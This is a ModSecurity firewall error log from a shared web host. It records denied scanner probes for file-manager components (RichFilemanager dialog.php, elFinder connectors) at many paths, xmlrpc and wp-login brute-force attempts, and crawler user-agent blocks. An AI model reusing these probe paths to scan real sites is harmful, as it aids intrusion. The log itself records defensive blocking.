[Tue May 26 14:41:25.239056 2026] [security2:error] [pid 636820:tid 636969] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjvK_r6oOphPch7B94twAAABM"]
[Tue May 26 14:41:25.706296 2026] [security2:error] [pid 636820:tid 636994] [client 108.136.162.67:51689] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/cp/filemanager/dialog.php"] [unique_id "ahVjva_r6oOphPch7B942QAAACw"]
[Tue May 26 14:41:26.464015 2026] [core:crit] [pid 636820:tid 637036] (13)Permission denied: [client 40.77.167.37:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:41:26.514382 2026] [security2:error] [pid 636820:tid 637020] [client 108.136.162.67:51867] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/public/filemanager/dialog.php"] [unique_id "ahVjvq_r6oOphPch7B946QAAAEY"]
[Tue May 26 14:41:27.150819 2026] [security2:error] [pid 636820:tid 637062] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjvq_r6oOphPch7B948gAAAHA"]
[Tue May 26 14:41:27.316391 2026] [security2:error] [pid 636820:tid 637029] [client 108.136.162.67:52029] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/public/assets/filemanager/dialog.php"] [unique_id "ahVjv6_r6oOphPch7B95FAAAAE8"]
[Tue May 26 14:41:28.124995 2026] [security2:error] [pid 636820:tid 637036] [client 108.136.162.67:52152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/static/assets/filemanager/dialog.php"] [unique_id "ahVjwK_r6oOphPch7B95LAAAAFY"]
[Tue May 26 14:41:28.161112 2026] [security2:error] [pid 636820:tid 637018] [client 202.141.83.254:53802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjwK_r6oOphPch7B95KgAAAEQ"]
[Tue May 26 14:41:28.161296 2026] [security2:error] [pid 636820:tid 637018] [client 202.141.83.254:53802] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjwK_r6oOphPch7B95KgAAAEQ"]
[Tue May 26 14:41:28.251352 2026] [security2:error] [pid 636820:tid 636955] [client 45.86.159.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjv6_r6oOphPch7B95JQAAAAU"]
[Tue May 26 14:41:28.515516 2026] [security2:error] [pid 636820:tid 637068] [client 216.244.66.241:50080] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/ai1ec_event/426/"] [unique_id "ahVjwK_r6oOphPch7B95PQAAAHY"]
[Tue May 26 14:41:28.515668 2026] [security2:error] [pid 636820:tid 637068] [client 216.244.66.241:50080] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/ai1ec_event/426/"] [unique_id "ahVjwK_r6oOphPch7B95PQAAAHY"]
[Tue May 26 14:41:28.612391 2026] [security2:error] [pid 636820:tid 637074] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjwK_r6oOphPch7B95NQAAAHw"]
[Tue May 26 14:41:28.887511 2026] [security2:error] [pid 636820:tid 636872] [remote 74.7.241.58:59424] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVjwK_r6oOphPch7B95SwAALTM"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/fl
[Tue May 26 14:41:28.901590 2026] [security2:error] [pid 636820:tid 637017] [client 108.136.162.67:52282] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/data/filemanager/dialog.php"] [unique_id "ahVjwK_r6oOphPch7B95TAAAAEM"]
[Tue May 26 14:41:29.786251 2026] [security2:error] [pid 636820:tid 637004] [client 209.141.44.244:44441] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.44.141.209.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVjwa_r6oOphPch7B95VwAAADY"]
[Tue May 26 14:41:29.801673 2026] [security2:error] [pid 636820:tid 637006] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjwa_r6oOphPch7B95ZgAAADg"]
[Tue May 26 14:41:30.316411 2026] [security2:error] [pid 636820:tid 637033] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjwq_r6oOphPch7B95dgAAAFM"]
[Tue May 26 14:41:30.456452 2026] [security2:error] [pid 636820:tid 637076] [client 165.231.168.101:44986] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVjwa_r6oOphPch7B95bgAAAH4"], referer: https://www.cagmedya.com/gizlilik-ve-guvenlik-politikasi/
[Tue May 26 14:41:30.674676 2026] [security2:error] [pid 636820:tid 636952] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjwq_r6oOphPch7B95ewAAAAI"]
[Tue May 26 14:41:31.019905 2026] [security2:error] [pid 636820:tid 636961] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjwq_r6oOphPch7B95iwAAAAs"]
[Tue May 26 14:41:31.190767 2026] [security2:error] [pid 636820:tid 637054] [client 216.244.66.241:50096] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/archives/author/mansionsapporo/"] [unique_id "ahVjw6_r6oOphPch7B95lgAAAGg"]
[Tue May 26 14:41:31.190917 2026] [security2:error] [pid 636820:tid 637054] [client 216.244.66.241:50096] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/archives/author/mansionsapporo/"] [unique_id "ahVjw6_r6oOphPch7B95lgAAAGg"]
[Tue May 26 14:41:31.397353 2026] [security2:error] [pid 636820:tid 637036] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjw6_r6oOphPch7B95nQAAAFY"]
[Tue May 26 14:41:31.397932 2026] [security2:error] [pid 636820:tid 636999] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjwq_r6oOphPch7B95iAAAADE"]
[Tue May 26 14:41:31.742494 2026] [security2:error] [pid 636820:tid 636964] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjw6_r6oOphPch7B95pQAAAA4"]
[Tue May 26 14:41:32.104310 2026] [security2:error] [pid 636820:tid 636995] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjxK_r6oOphPch7B95uQAAAC0"]
[Tue May 26 14:41:32.465241 2026] [security2:error] [pid 636820:tid 637003] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjxK_r6oOphPch7B95ygAAADU"]
[Tue May 26 14:41:32.809241 2026] [security2:error] [pid 636820:tid 637006] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjxK_r6oOphPch7B951QAAADg"]
[Tue May 26 14:41:32.862945 2026] [security2:error] [pid 636820:tid 637000] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjxK_r6oOphPch7B95zQAAADI"]
[Tue May 26 14:41:33.149867 2026] [security2:error] [pid 636820:tid 636983] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjxa_r6oOphPch7B955AAAACE"]
[Tue May 26 14:41:33.457544 2026] [security2:error] [pid 636820:tid 637026] [client 216.244.66.241:50110] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/archives/category/technology/outdoor"] [unique_id "ahVjxa_r6oOphPch7B958QAAAEw"]
[Tue May 26 14:41:33.457668 2026] [security2:error] [pid 636820:tid 637026] [client 216.244.66.241:50110] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/archives/category/technology/outdoor"] [unique_id "ahVjxa_r6oOphPch7B958QAAAEw"]
[Tue May 26 14:41:33.495290 2026] [security2:error] [pid 636820:tid 637070] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjxa_r6oOphPch7B957AAAAHg"]
[Tue May 26 14:41:33.833257 2026] [security2:error] [pid 636820:tid 637074] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjxa_r6oOphPch7B95_AAAAHw"]
[Tue May 26 14:41:34.171031 2026] [security2:error] [pid 636820:tid 636955] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjxq_r6oOphPch7B96CwAAAAU"]
[Tue May 26 14:41:34.198849 2026] [security2:error] [pid 636820:tid 636914] [remote 52.167.144.20:36874] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.144.167.52.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dgssi.in"] [uri "/index.php"] [unique_id "ahVjxq_r6oOphPch7B96DAAAJV0"]
[Tue May 26 14:41:34.517309 2026] [security2:error] [pid 636820:tid 636983] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjxq_r6oOphPch7B96EAAAACE"]
[Tue May 26 14:41:34.892954 2026] [security2:error] [pid 636820:tid 637076] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjxq_r6oOphPch7B96NgAAAH4"]
[Tue May 26 14:41:34.940568 2026] [security2:error] [pid 636820:tid 637025] [client 62.244.225.226:55456] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVjxq_r6oOphPch7B96GwAAAEs"]
[Tue May 26 14:41:35.250636 2026] [security2:error] [pid 636820:tid 636954] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjx6_r6oOphPch7B96RwAAAAQ"]
[Tue May 26 14:41:35.397264 2026] [security2:error] [pid 636820:tid 637024] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjxq_r6oOphPch7B96PwAAAEo"]
[Tue May 26 14:41:35.410410 2026] [security2:error] [pid 636820:tid 637000] [client 216.244.66.241:38738] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/blog/2605.html"] [unique_id "ahVjx6_r6oOphPch7B96TwAAADI"]
[Tue May 26 14:41:35.410519 2026] [security2:error] [pid 636820:tid 637000] [client 216.244.66.241:38738] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/blog/2605.html"] [unique_id "ahVjx6_r6oOphPch7B96TwAAADI"]
[Tue May 26 14:41:35.605550 2026] [security2:error] [pid 636820:tid 637067] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjx6_r6oOphPch7B96VQAAAHU"]
[Tue May 26 14:41:35.875458 2026] [security2:error] [pid 636820:tid 637063] [client 108.136.162.67:52420] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/application/elFinder/php/connector.minimal.php"] [unique_id "ahVjx6_r6oOphPch7B96XQAAAHE"]
[Tue May 26 14:41:36.683475 2026] [security2:error] [pid 636820:tid 637076] [client 108.136.162.67:53502] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/data/elfinder/php/connector.minimal.php"] [unique_id "ahVjyK_r6oOphPch7B96fgAAAH4"]
[Tue May 26 14:41:37.074374 2026] [security2:error] [pid 636820:tid 637053] [client 216.244.66.241:38740] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/fs/dragee/c/gr426"] [unique_id "ahVjya_r6oOphPch7B96hgAAAGc"]
[Tue May 26 14:41:37.074483 2026] [security2:error] [pid 636820:tid 637053] [client 216.244.66.241:38740] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/fs/dragee/c/gr426"] [unique_id "ahVjya_r6oOphPch7B96hgAAAGc"]
[Tue May 26 14:41:37.471281 2026] [security2:error] [pid 636820:tid 637024] [client 108.136.162.67:53608] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/elFinder/php/connector.minimal.php"] [unique_id "ahVjya_r6oOphPch7B96lwAAAEo"]
[Tue May 26 14:41:37.508205 2026] [security2:error] [pid 636820:tid 636969] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjya_r6oOphPch7B96iQAAABM"]
[Tue May 26 14:41:38.262543 2026] [security2:error] [pid 636820:tid 637038] [client 108.136.162.67:53700] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/elfinder/php/connector.minimal.php"] [unique_id "ahVjyq_r6oOphPch7B96qQAAAFg"]
[Tue May 26 14:41:38.443296 2026] [security2:error] [pid 636820:tid 636981] [client 202.141.83.254:53833] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjyq_r6oOphPch7B96sQAAAB8"]
[Tue May 26 14:41:38.443391 2026] [security2:error] [pid 636820:tid 636981] [client 202.141.83.254:53833] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjyq_r6oOphPch7B96sQAAAB8"]
[Tue May 26 14:41:38.527162 2026] [security2:error] [pid 636820:tid 637056] [client 216.244.66.241:38752] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/fs/dragee/c/gr459"] [unique_id "ahVjyq_r6oOphPch7B96uAAAAGo"]
[Tue May 26 14:41:38.527286 2026] [security2:error] [pid 636820:tid 637056] [client 216.244.66.241:38752] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/fs/dragee/c/gr459"] [unique_id "ahVjyq_r6oOphPch7B96uAAAAGo"]
[Tue May 26 14:41:39.060932 2026] [security2:error] [pid 636820:tid 637004] [client 108.136.162.67:53798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/js/elfinder/php/connector.minimal.php"] [unique_id "ahVjy6_r6oOphPch7B96xQAAADY"]
[Tue May 26 14:41:39.651575 2026] [security2:error] [pid 636820:tid 636994] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjy6_r6oOphPch7B960AAAACw"]
[Tue May 26 14:41:39.784786 2026] [security2:error] [pid 636820:tid 636967] [client 216.244.66.241:38764] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/fs/dragee/c/gr898"] [unique_id "ahVjy6_r6oOphPch7B965gAAABE"]
[Tue May 26 14:41:39.784927 2026] [security2:error] [pid 636820:tid 636967] [client 216.244.66.241:38764] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/fs/dragee/c/gr898"] [unique_id "ahVjy6_r6oOphPch7B965gAAABE"]
[Tue May 26 14:41:39.885060 2026] [security2:error] [pid 636820:tid 637029] [client 108.136.162.67:53891] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/plugins/elfinder/php/connector.php"] [unique_id "ahVjy6_r6oOphPch7B966gAAAE8"]
